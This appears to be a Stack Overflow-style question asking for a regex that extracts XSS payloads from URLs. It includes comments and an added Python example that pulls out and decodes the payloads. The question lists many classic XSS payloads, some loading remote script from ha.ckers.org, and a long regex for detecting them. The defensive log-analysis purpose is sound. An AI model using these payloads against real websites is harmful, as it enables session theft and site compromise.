Regex to match all XSS payloads in the following list
I need a regex that will match all the XSS payloads in the following list (I'm not trying to filter XSS requests and safely log the URLs, I'm trying to pull the payload out of the URL itself and store it in a variable for later use):
http://www.example.com/subcat.php?id=24\x3c
http://www.example.com/subcat.php?id=24\x3C
http://www.example.com/subcat.php?id=24\u003c
http://www.example.com/subcat.php?id=24\u003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24%3C
http://www.example.com/subcat.php?id=24<script>alert(123)</script>
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script>
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss")
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');">
http://www.example.com/subcat.php?id=24<img src=javascript:alert("XSS")>
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT>
.... (for all see the URL)
I did manage to find one and modify it to match some of them, but not all:
<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=
For an example see here; it will only match the ones that contain a <script>, and for some of them it won't make a full match. Does anyone have a better regex that will match only the XSS payload in the URL, or a better way to find the XSS payload? Thanks in advance.
Possible duplicate of [Python library for XSS filtering?](https://stackoverflow.com/questions/901369/python-library-for-xss-filtering) – ctwheels
@ctwheels thanks! – wahwahwah
@ctwheels hey, I appreciate it, but that doesn't answer my question. I'm not trying to filter the XSS, I'm trying to extract the payload from the URL and store it as a variable. – wahwahwah
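Since the comments make clear the goal is extraction rather than filtering, here is an added Python example (not code from the question or its comments) that takes the part of the id value following the expected digits out of each URL and then decodes the percent, \x/\u and HTML-entity forms seen in the list into one comparable string. The names extract_payload and normalize are chosen here; the code assumes the tampered parameter is the last one in the query string and that its legitimate value is numeric.

```python
"""Extract the injected part of a URL query parameter for later analysis.

Added example for the question above, not code from the original post. It
assumes the parameter's legitimate value is numeric (id=24 in the list) and
that the tampered parameter is the last one in the query, so everything after
the leading digits is the payload ('&' and '#' may be part of it, so neither
is treated as a delimiter).
"""
import html
import re
from typing import Optional
from urllib.parse import unquote

# JavaScript-style escapes that appear literally in the URL (\x3c, \u003C).
_JS_ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|u([0-9A-Fa-f]{4}))")


def extract_payload(url: str, param: str = "id") -> Optional[str]:
    """Raw text after the numeric prefix of param's value; None if absent/clean."""
    query = url.partition("?")[2]  # not urlsplit(): '#' may be payload, not fragment
    m = re.search(r"(?:^|&)" + re.escape(param) + r"=(.*)$", query, re.S)
    if not m:
        return None
    value = m.group(1)
    tail = value[re.match(r"\d*", value).end():]
    return tail or None


def normalize(payload: str) -> str:
    """Undo the encodings the list shows: percent-encoding (%3C), then JS
    escapes (\\u003c), then HTML character references (&lt;), one layer each."""
    text = unquote(payload)
    text = _JS_ESCAPE.sub(lambda e: chr(int(e.group(1) or e.group(2), 16)), text)
    return html.unescape(text)


if __name__ == "__main__":
    # Constructed sample URLs in the same shape as the question's list.
    for u in (
        "http://www.example.com/subcat.php?id=24",
        "http://www.example.com/subcat.php?id=24\\u003C",
        "http://www.example.com/subcat.php?id=24%3Cscript%3Ealert(123)%3C/script%3E",
        "http://www.example.com/subcat.php?id=24&lt;img src=x&#62;",
    ):
        p = extract_payload(u)
        print(repr(p), "->", repr(normalize(p)) if p else "clean")
```

Keeping the raw tail and the normalized form side by side lets you log exactly what was sent while still grouping the \x3c, %3C and &lt; variants as the same payload.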